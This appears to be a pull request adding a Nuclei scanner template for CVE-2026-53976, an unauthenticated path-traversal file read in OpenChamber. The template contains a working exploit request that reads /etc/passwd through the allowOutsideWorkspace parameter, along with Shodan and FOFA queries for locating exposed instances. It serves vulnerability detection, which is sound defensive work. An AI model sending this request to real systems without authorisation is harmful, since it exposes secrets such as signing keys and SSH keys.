### PR TITLE
Add CVE-2026-53976: OpenChamber <1.13.0 unauthenticated arbitrary file read

### DIFF
--- a/http/cves/2026/CVE-2026-53976.yaml
+++ b/http/cves/2026/CVE-2026-53976.yaml
@@ -1,0 +1,51 @@
+id: CVE-2026-53976
+
+info:
+  name: OpenChamber <1.13.0 - Unauthenticated Arbitrary File Read
+  author: str4k3r
+  severity: critical
+  description: |
+    OpenChamber before 1.13.0 contains an unauthenticated arbitrary file read
+    vulnerability in the /api/fs/read (and sibling /api/fs/stat, /api/fs/raw)
+    endpoints. When the request carries allowOutsideWorkspace=true, the server
+    resolves the user-supplied `path` query parameter as an absolute path and
+    the isPathWithinRoot guard becomes vacuous (the resolved file's own parent
+    directory is used as the containment root), so a remote, unauthenticated
+    attacker can read any file readable by the server process (e.g. /etc/passwd,
+    the JWT signing secret, SSH private keys). Fixed in 1.13.0, which requires a
+    server-minted outsideFileGrant token for any out-of-workspace read and
+    otherwise returns HTTP 400.
+  reference:
+    - https://www.vulncheck.com/advisories/openchamber-path-traversal-file-read-via-allowoutsideworkspace-parameter
+    - https://github.com/openchamber/openchamber/commit/f1b9506132faf6c564a2694c7f33b94421a49b4a
+    - https://github.com/openchamber/openchamber
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53976
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2026-53976
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.title:"OpenChamber"
+    product: openchamber
+    vendor: openchamber
+    fofa-query: title="OpenChamber"
+  tags: cve,cve2026,openchamber,lfi,fileread,traversal,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/fs/read?allowOutsideWorkspace=true&path=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-53976.yaml
+++ b/http/cves/2026/CVE-2026-53976.yaml
@@ -5,16 +5,11 @@ info:
   author: str4k3r
   severity: critical
   description: |
-    OpenChamber before 1.13.0 contains an unauthenticated arbitrary file read
-    vulnerability in the /api/fs/read (and sibling /api/fs/stat, /api/fs/raw)
-    endpoints. When the request carries allowOutsideWorkspace=true, the server
-    resolves the user-supplied `path` query parameter as an absolute path and
-    the isPathWithinRoot guard becomes vacuous (the resolved file's own parent
-    directory is used as the containment root), so a remote, unauthenticated
-    attacker can read any file readable by the server process (e.g. /etc/passwd,
-    the JWT signing secret, SSH private keys). Fixed in 1.13.0, which requires a
-    server-minted outsideFileGrant token for any out-of-workspace read and
-    otherwise returns HTTP 400.
+    OpenChamber 1.11.7 contains a path traversal vulnerability in the file-serving endpoints /api/fs/read, /api/fs/stat, and /api/fs/raw that allows unauthenticated remote attackers to read arbitrary files by supplying the allowOutsideWorkspace=true query parameter alongside an absolute path, bypassing the workspace boundary check in resolveReadPathFromContext. Attackers can exploit the vacuous isPathWithinRoot guard to read sensitive files such as the JWT signing secret, SSH private keys, API credentials, and environment variables, enabling full authentication bypass by forging session cookies on password-protected deployments.
+  impact: |
+    Unauthenticated attackers can read sensitive files and bypass authentication, leading to full system compromise.
+  remediation: |
+    Update to the latest version that fixes this vulnerability.
   reference:
     - https://www.vulncheck.com/advisories/openchamber-path-traversal-file-read-via-allowoutsideworkspace-parameter
     - https://github.com/openchamber/openchamber/commit/f1b9506132faf6c564a2694c7f33b94421a49b4a
@@ -32,7 +27,7 @@ info:
     product: openchamber
     vendor: openchamber
     fofa-query: title="OpenChamber"
-  tags: cve,cve2026,openchamber,lfi,fileread,traversal,unauth
+  tags: cve,cve2026,openchamber,lfi,traversal,unauth,oss
 
 http:
   - method: GET


### PR DESCRIPTION
## CVE-2026-53976 — OpenChamber unauthenticated arbitrary file read

OpenChamber before 1.13.0 exposes `/api/fs/read` (and siblings `/api/fs/stat`, `/api/fs/raw`). When a request carries `allowOutsideWorkspace=true`, the server resolves the user-supplied `path` as an absolute path and the `isPathWithinRoot` containment check becomes vacuous, letting a remote **unauthenticated** attacker read any file readable by the server process (e.g. `/etc/passwd`, JWT signing secret, SSH keys).

- **Endpoint:** `GET /api/fs/read?allowOutsideWorkspace=true&path=/etc/passwd` (generic, present on every install)
- **Auth:** none required on default config
- **Oracle:** HTTP 200 + `root:.*:0:0:` (self-contained, no OOB)
- **Fixed in:** 1.13.0 (requires a server-minted outsideFileGrant token → HTTP 400)

### Validation
Verified with native nuclei against official images:
- Vulnerable `@openchamber/web` 1.12.4 → **DETECTED** (3/3), leaks `/etc/passwd`
- Fixed 1.13.0 → **NOT_DETECTED** (3/3), returns `400 {"error":"Outside workspace file access requires a grant"}`

### References
- https://www.vulncheck.com/advisories/openchamber-path-traversal-file-read-via-allowoutsideworkspace-parameter
- https://github.com/openchamber/openchamber/commit/f1b9506132faf6c564a2694c7f33b94421a49b4a
- https://nvd.nist.gov/vuln/detail/CVE-2026-53976